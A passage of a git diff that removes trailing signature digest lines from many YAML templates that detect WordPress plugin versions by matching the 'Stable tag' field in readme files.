4a0a00473045022100eef4d5274b6202a91f8a824f97e0aa7b41ccd6cd1fc8e74f9f8f625d9591b8bb0220515fd611c70f9a78488edc3769f2891fb9d6cd68b8e08abd825711b01a5d69f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index c18b71617d9..f8903fa3dbb 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ad807f68c8d344a073a6d796c2b878b7977465bb85ab60a6cdf70cbd64a8d622022100afde7745f538b1f6c86892f71df8b3dd427a5735405021ba72eda4b0a4d8a6e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 6c1108caa6e..ae2451ca381 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d27064c086bb7342a00128ed684fdb4eebd1255c0ba0d8792fa605383c6e62c7022100f4130be066fe86663c4ef094bc3cb9354ce8ce46e99eed63bb536e65fc1f430c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index c07ce1aa4fd..dcc61d1255b 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ab53ee55334b8a73931890e8b1e5d5b3e7ceb56eba2dde633eff03c4805746a1022100943db8300198dd448fd263f192377281d68ded7c83fb201205d933c90714f46c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 8176c98e5f5..d1d2c1c1d00 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202148eeeb3f04ea678f42a1cb1c404979deab862e3452f558f8a70dac1570648a022100bc996b252f2452ec48adb8912a756bcbced7f3128156bdec2242c1d76b74b620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 99783df32eb..5f5e8afed51 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206d653c207d83df862e04228721919f64217590670f7a37398bfb9a4e916954ed022100f11968222cc71f24d4b244b431c3d6810796bc665cd18b14a07122b2727a1b36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index ba44a795fd1..d15634bb2b1 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c3e37fa65b51fd729fc85b414cfa487c9669ec944bfa78099f29fb1511216e63022100f2218bcf39667ea2574304d545f7b98ccbdcfce7077806fa25eb94619b2bae44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index ea59b59420c..7da04be5d3e 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d0a923593822ff0d29917daa1cbb8bdf7c41fe47cbeb9d3d73bcbbb8ec47018b022016927fd78933e1768e752b00393f1950b8a0be4cfe1597601779afb6a4e3e6b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 00ba9936cd8..a79253cec50 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5d6c6a7ac63c2cc08ba609f1645d78898eeca5e1f1662009ef026ad04fab922022100c89b5089086e58771f03e7d3d5848a1215bc28e2ae16a2b58a37486687648e21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index b2136ff15a4..77fc04a2203 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022000acc83ebfa8bd480806f90d9484826698d249dc982298e1535c7d24f0a84c2f02207693c3f0bccca288ca84c8164e4dac2f77971e71c44a335b5f51ded5e5f9225e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index f168b245e16..733f9ee453e 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008a207cd1b70752b838f3c56979bb0f917751984d4d4ededcc94d5d767643b6d90220072b169383d0d81a129a6c061635df96a0c188b2fa730e899eb4a6bc63d76883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 6685b6e2b5e..0af08f0ac08 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100bf70b05b6f158d4ccfa5e8deb60742e0a1967e26faa00415d48a7dc113360f20022100ed1dc00ddf79e705b38eedc11a0847f40d6bfc427beb928fa2fca8cd3baffafb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 06857503881..1e4c77fbca9 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6b0e8a23796358a87c53b5eb4c176c37bbf86d96eeee9ecc8c074d3ed27cc6c022100d26ec955a70170f4d3cf34d4625efd8625b5b9cb1524e2e2b3fbfcdd4dccb2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 4893861a05e..295e3fe82db 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ac332c4b17afa222d60f74ef9cad782530929ac09de10e8cb3c3444e6bd01fd10220387908e59ff21d629c5fa15639b32cb3b5037bac32049262f2f034620f5260da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 98d7cf165c8..862f73201fc 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e87fdfbe0ce09e286b1e932e267a6adecb171efa1bcb17dc5647261a20660d86022100e0d00f5fa2e52d80f1460b002eca7a139ccad7fd1bfe8547277021f66a139f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 956c0e5b65f..711b64f9d07 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202df9732f740eae61adefc3c773c6fcb9636034364ab28cfad2ef607e1851591002200f279d5ff7927c73bca2e534460571e897033b9df2d679e3e962c03555e865b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 4bba6e3236f..58ddcfab78a 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba8ce48e4dc781ba08946334beed4326ebf19f83b9b02e64c1bec84ca8679da3022100dfb50cc5210c1313f7be1c05ef6097c80f1990c075e59efea8fa9f36d355fb60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 191db3e7d60..305d74e8eaf 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201de62249a0ee24646ec876a1f84a258120a2a814c937e1a6de12521e6dfd1df302205720a3234711f31b019abc45c0c9d0173cc9748e8a857a94d9b02d8ad609546c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index bb6d549a28a..668162fc4e1 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009391f4c5583b946cd169fb6a3d02238835cd04d3fd8a126a29576e2d59f7ab6a02200ae2dba28c079cefb99a4947e43721154d9c383635d8160ef2542f932b487760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index dba08b2aad8..2a233f389dc 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210094ed24404a60814e4079abe0b2b0d72d1271b3e59d78aefdd2f82ee529cedf92022100b12ad1391408ddba975704bd5ddf56021f9c7b6e8ad2d155a5bd6ebd09360ab8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 902a6feb34b..a0d2554492c 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205681d9bc9ffc0d57470edc6ee97e007aeda9149f94ed3ab75cba0e3ec2d3cec9022100f93da2db208bd6f0fbf6331e5df823d746c1b9451d4667a7f74c1e92172d0898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index d6110b55d43..4e5046273d1 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022074a93b4cd30c5c4002706b3198b26882973b91ebe6b95dd91d1dc29a87da38c8022100e59bf1bfdcdb3da575ccced326acc997bc3aacad9141f9e8b4c80defdbf67c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index d0cbb5d8905..f44cee79807 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100881b910cf85347244be1150fd232a31fa97d1f2fddc8c321f7f089d973f8ac7f022060a0ed743abaacf5f041a0fb45618b4e3e8d14fdcc843bec34c644911d9299b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index e5b105a9b98..39130db767b 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b596a36fd6efb3a4e672ad84559fcfa02850988e269c4fd52a22a69675fffd5022100f8a4df34e4a8651f719d9cebd777d4448e7e52699c85cbb631c17bdb900f7771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 6252d46ddc9..39c497073ca 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206739464cb623c68ed0df4589d5fb6e8c8187a30edc196d5c141ce583cc9710f90220594570d6a11a0a2b1f724a1e6979aff64037b87859cd779e2893809994faceb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index bbf6910a403..b848288b55f 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220790768da970a20f3bd890fd7fbf93cc7c879cdec2c756d5a35e09ee8cc10befe02203ec410b5bd4845fb981a8015149faee3ab99e449a7a2214480b8aff9c7e672d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 703b1f53ac7..4d10178692e 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220339f893e3efce940a548072d00db202c03fb7693cbed1792d998523d9d26d29d022100d6c6b606fa1ae7fd34985101c5bc5ccc2e804e5cc4337e9df621b3b384bd056f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index b4c674a93fa..7aac0a153f3 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c50d8b4a45d0d53b144f8711b255a4c9388ec0a89f6aa8dd4cb04a03663d05d022012a6d49247249ccc01acc7c410f94c6c623b7fb71f5341d22b16063f6b9fb5b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 94a31ea600b..d0cebd5316c 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022066b4e30f494404096d0e06a809a482c18f2c5b02167cdeddebf20f30e459ec90022047b680f4eb64ea4275e5fefdfa939a00b6748d5516b30f1944dc3ed1e12ed49e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cafb7297962..ff207791572 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009151e10d0bea4aa9d96015842d91f721f116775d6cd106d5445ca431ad36e80a022071ef2a83242172beadfa4fddf5d0f4c94d84b1e528f6cf9ecd94d01ab23d98c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index a0d592972af..fffdc7d017a 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d0dc36db6924f9753e3431c04706411a49e371cf494bced6959f09d1cd72a8e02203d583d761010935c92d7f01eae41be6fb3c7ae3b5090126e0098e56b30ca1bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 2ebbd61eee2..7a9746a70d5 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d04ccb99971aa4953f9c33fad148bf56dfcb69a84eb15a5d8ec2413be6e2ef04022100ad0e2ea7af645ce2f85f7d2c69bea3ecfaa7ab76be934bbd7e27362e9949fcae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 2f6fe06e088..3fe86debf56 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c7ec6a6c72e7f9b92ee07627ef5236944f3ad85bb835e2012b5917101f0b6371022100fbb9b00ade408a0e02e1afc172bb10a9ea32d8d821e0ae3862146ddedbf47e73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 8eebac375e3..18a7437e94b 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e280f6cc83036eb0aecb41a3af235b4b3e420805c5341e13d1277176e1556a250220532425e58d01382b95f0dcdb7cd62112369ddf23c03511219b0f334166c7f3bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3c606dfc0c9..3deac58709d 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ca28d01cc6a0c4bdf7cdd88f3c65d1918ee0f16bc4341e1e508869823d41e644022100a5f3b017070bfbfb7e3660eb72c0137b1a9e15cf79adfba7df97240a5b4e9fe2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9e8b4e32d73..e7e7c276825 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100850fbfb7e5415f70da15b02df0366d757edd89f935212f47ea86d2a21a9a4339022100f01e816b9fca0b5b047c31fd6b3a1c27173fa4de510410719fe75e93a6b0aef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index de37f472871..ad4ebefa4b1 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f07e73eb69ce00ee7fee870029500541e07f225af88627b27269c8e31e71b7f302200815bb02877ae77bceb8c9530be35b481718fe497c0bd7fc49b4f0b5de265b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index c84a853e500..8e88c81c0a9 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ab8c36aaaac556056cf9f559856cf180547d99f7061a1e477aedcd96cfdfdc00221009c0475b08d5358f007fcfd298c460507237fa9a5cb4f2502c0258d06aeee92d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 088c5d768a3..39d269fb856 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a388d964cda6ce890cf8371ca2af110e20dba2fa79f7566e69c1a5149ef0b9670220499f6dcd84f30b4f6beda5172a6c1f2b58a23d9d5bf68ac5d0110e55b4dc47f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index b0416aea176..fc126d83c63 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b611f8cc8d94d21bb2ad69ea7ea1c2d029b27795cf97d42308bc131e175bd02a02205ae253538fded0b1e320170831b74e0588c40aba36394565263c368aa1f84432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index cd35b6852c5..8c49a342590 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057847e86f4e979d7321f26c305f4325e80a5f9f061047db22933ec335f3cc5d40220773dc8aaf89c9acf7f05cc2fe3b9f38f72800493bf6d8fb23cf6c2582c802a93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ab6fe1857d..6ac2212b4be 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100beb785a9e4d69ab3178c5849b6f1a8c15b3aa25aa19cb7f11d255b085d85dd85022100cded374998ee7ca7200e9393618e26c97000a16fdeb87c9d3f05dc6f34670bad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 260bdd0b29f..71c71b5ed14 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022040b3d1faef230d8be754882ce985f16c4a5c035105fe24f1b92ce596bc28c64102205f2bf89c7811c9226fe2b901b5f5f9f81f61e40190e4f47bb5b30c7c19de36ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 2262dd822bf..7b47adc274b 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef63bff8df8caf334edd220d15dd71e9faa82ae57949ebac7d5cec174675cd76022100dfefce3818dc25208e445ac809436ebfea915a8e593b7b718dfe7fac0634bd1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index d6efba4e317..286dfdaec66 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206eb440d991569aadd61685405f04e76d630cd661c12a03edc9da94d25bc03a380220783ded88acbe962891bf378e982ba7d1c32a4a31f6e80f7794e9b662bcab8903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 5b4adc339d7..c4928059f6c 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203b449aa05cc7772b0d3b99f0e02dd6669139ceacd7d0688c50bfa3abc572a03a02206cd534622bf5d253eef38d3da8edc8449fe3bc002453abd8cac5846954ebe5c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 6524c3e39b7..f6a7836f35a 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b40f9c9009a778b48ac8e103b61471ab8c02df63020e945920f79fde3120e8c0022041a028670298dad115a9b0a3201b3c6a7b43eed624a3cd6b68ee9d4ea328ede8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index d44ac6f3c0c..b7af708c4fa 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ 